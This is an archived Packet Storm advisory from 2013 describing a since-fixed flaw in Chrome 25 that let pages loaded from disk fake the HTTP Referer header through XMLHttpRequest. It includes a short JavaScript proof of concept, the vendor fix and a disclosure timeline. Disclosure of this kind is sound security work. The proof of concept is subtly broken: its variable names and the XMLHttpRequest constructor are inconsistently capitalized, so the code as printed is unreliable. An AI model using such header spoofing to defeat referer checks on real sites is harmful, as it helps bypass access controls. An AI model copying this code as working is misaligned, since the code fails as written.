exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Google Chrome 25.0.1364.152 HTTP Referer Header Faking

Google Chrome 25.0.1364.152 HTTP Referer Header Faking
Posted Jul 8, 2013
Authored by Liad Mizrachi

Google Chrome version 25.0.1364.152 suffers from an XMLHttpRequest HTTP Referer Header faking vulnerability.

tags | exploit, web
SHA-256 | b637b280b79f7030e948538de6695ffcde18a45fea4e3bb46f714e32896ebea4

Google Chrome 25.0.1364.152 HTTP Referer Header Faking

Change Mirror Download
Advisory:                      XMLHttpRequest HTTP Referer Header Faking
Author: Liad Mizrachi
Vendor URL: http://www.chromium.org/
Vulnerability Status: Fixed
Application Version: Google Chrome v25.0.1364.152


==========================
Vulnerability Description
==========================

Chromium is the open source web browser project from which Google
Chrome draws its source code.

Chromium fails to validate the use of unsafe headers when the page is
load from the local drive, allowing to set and change the referer
header using "setRequestHeader" when generating a Ajax
(XMLHttpRequest) request.


==========================
PoC
==========================

function SendReq()
{
var xmlhttp = new XmlHttpRequest();
xmlHttp.onreadystatechange = readyStateChanged;
xmlHttp.open("GET", "http://AnySite.com/checkReferer.php", true);
xmlHttp.setRequestHeader("Referer", "http://valid.referer.com");
xmlHttp.send();
}


==========================
Solution
==========================

Block all scripts from setting unsafe headers in XMLHttpRequest.
- Fixed by vendor.



==========================
Disclosure Timeline
==========================

04-Mar-2013 - Google Security Team informed by mail.
14-Mar-2013 - Google Security Team Reply: "Since ChromeOS is an open
source project, please file the report directly in their bug tracker"
14-Mar-2013 - Security Bug Opened @ Chromium project.
30-Apr-2013 - Fixed.


==========================
References
==========================
http://www.chromium.org/
https://codereview.chromium.org/13979011/


Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close